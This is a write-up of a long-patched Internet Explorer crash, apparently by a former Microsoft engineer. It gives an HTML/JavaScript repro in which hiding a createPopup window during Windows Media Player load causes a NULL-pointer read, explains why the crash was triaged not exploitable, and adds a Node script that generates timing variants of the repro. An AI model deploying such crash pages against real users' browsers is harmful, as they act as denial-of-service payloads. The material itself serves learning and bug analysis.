Loading a Windows Media Player <object> inside a createPopup document and hiding the popup during the same load cycle caused a NULL-pointer read in MSHTML!CFakeUIWindow::SetBorderSpace. Classified PROBABLY_NOT_EXPLOITABLE (the !exploitable triage category).
<script language="JavaScript">
// IE-only repro: createPopup() is an Internet Explorer extension.
var myPop;
function main()
{
    myPop = createPopup();
    myPop.show(0,0,100,100);
    // The deferred script hides the popup in the same load cycle that
    // instantiates the WMP control. The closing tag is written as <\/script>
    // so the HTML parser does not terminate the outer script early.
    myPop.document.write('<script defer>top.myPop.hide();<\/script><object classid="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6"></object>');
    myPop.document.close();
}
</script>
<!-- assumed trigger: the original case's onload hook is not shown on the page -->
<body onload="main()"></body>
The deferred script called hide() on the popup before WMP had finished initializing inside it. CFakeUIWindow::SetBorderSpace, called as part of the ActiveX site setup, expected a valid UI window pointer, but that window had already been torn down when the popup was hidden, so the call read through NULL. A read through a NULL pointer with no attacker-controlled offset is a crash rather than a memory-corruption primitive, which is why the case was triaged PROBABLY_NOT_EXPLOITABLE rather than EXPLOITABLE.
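To check how much the crash depends on the deferred timing, it helps to generate variants of the repro that move the hide() call to different points in the popup's load cycle. The following Node script is an added example, not code from the original post or from Microsoft's tooling; the variant names and the setTimeout control case are my own assumptions, and only the CLSID and the outer page structure come from the repro above.

```javascript
// Added example: build variants of the createPopup/WMP repro with hide()
// placed at different points in the popup's load cycle.
// CLSID is the one from the post; variant names are hypothetical.

const WMP_CLSID = "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6";
const OBJECT_TAG = `<object classid="${WMP_CLSID}"></object>`;

// Each variant maps the hide statement to the markup written into the popup.
// Inside the document.write string the closing tag must appear as <\/script>,
// otherwise the HTML parser ends the outer <script> early. The template
// literals below emit a single backslash into the generated file.
const VARIANTS = {
  // Original case: deferred script runs after the written markup is parsed
  // but before WMP has finished its ActiveX site setup.
  deferred_before_object: (hide) =>
    `<script defer>${hide}<\\/script>${OBJECT_TAG}`,
  // hide() runs before the <object> tag has even been parsed.
  inline_before_object: (hide) =>
    `<script>${hide}<\\/script>${OBJECT_TAG}`,
  // hide() runs synchronously right after the tag is parsed.
  inline_after_object: (hide) =>
    `${OBJECT_TAG}<script>${hide}<\\/script>`,
  // Control case: hide() only after the load cycle has completed.
  timeout_after_load: (hide) =>
    `${OBJECT_TAG}<script>setTimeout(function(){${hide}},0);<\\/script>`,
};

// Wrap one variant payload in the outer page from the post. The outer page
// is identical across variants; only the written payload differs.
function buildRepro(variant, hideStatement = "top.myPop.hide();") {
  const make = VARIANTS[variant];
  if (!make) throw new Error("unknown variant: " + variant);
  const payload = make(hideStatement);
  return [
    '<html><body onload="main()">',
    '<script language="JavaScript">',
    "var myPop;",
    "function main()",
    "{",
    "  myPop = createPopup();",
    "  myPop.show(0,0,100,100);",
    "  myPop.document.write('" + payload + "');",
    "  myPop.document.close();",
    "}",
    "</script>",
    "</body></html>",
  ].join("\n");
}

// Return every variant keyed by name, so each can be saved as its own file
// and opened in the target IE build.
function buildAll() {
  const out = {};
  for (const name of Object.keys(VARIANTS)) out[name] = buildRepro(name);
  return out;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [name, html] of Object.entries(buildAll())) {
    console.log("=== " + name + " ===\n" + html + "\n");
  }
}
```

Each generated page contains exactly one real `</script>` (the outer one); every closing tag inside the written payload is escaped, which is the detail most likely to silently break a hand-edited variant.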
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.